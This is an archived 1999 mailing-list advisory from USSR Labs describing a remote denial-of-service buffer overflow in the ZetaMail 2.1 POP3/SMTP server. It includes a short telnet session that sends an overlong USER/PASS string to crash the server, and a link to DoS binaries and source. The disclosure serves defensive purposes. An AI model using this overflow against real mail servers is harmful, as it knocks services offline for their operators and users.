|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability
Ussr Labs (labs
USSRBACK.COM)
Fri, 19 Nov 1999 05:32:20 -0300
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
- Next message: Ussr Labs: "Remote DoS Attack in Vermillion FTP Daemon (VFTPD) v1.23 Vulnerability"
- Previous message: Doug Welsby: "Re: WordPad/riched20.dll buffer overflow"
Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability
PROBLEM
UssrLabs found a Local/Remote DoS Attack in ZetaMail 2.1 Mail POP3/SMTP
Server,
the buffer overflow is caused by a long user name/password, 3500 characters.
There is not much to expand on.... just a simple hole
Example:
[[gimmemoreitsme]$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK ZetaMail for 95 BD0211 <+OK ZetaMail for 95 BD0211 <4294764405.063903189415041itsme>
USER {buffer)
+OK Send password
PASS {buffer)
Overflow Crashh.
Where (buffer) is 3500 characters.
Binary / Source for the D.o.s for Windows / Linux:
http://www.ussrback.com/zmail/
Vendor Status:
Contacted.
Credit: USSRLABS
SOLUTION
install another program from the same vendor,
MsgCore/95 2.11,MsgCore/NT 2.10
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
http://www.ussrback.com
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE WIN2KSECADVICE"
** FOR A WEEKLY DIGEST, send the command "SET WIN2KSECADVICE DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
- Next message: Ussr Labs: "Remote DoS Attack in Vermillion FTP Daemon (VFTPD) v1.23 Vulnerability"
- Previous message: Doug Welsby: "Re: WordPad/riched20.dll buffer overflow"
This archive was generated by hypermail 2.0b3 on Fri Nov 19 1999 - 09:02:47 CST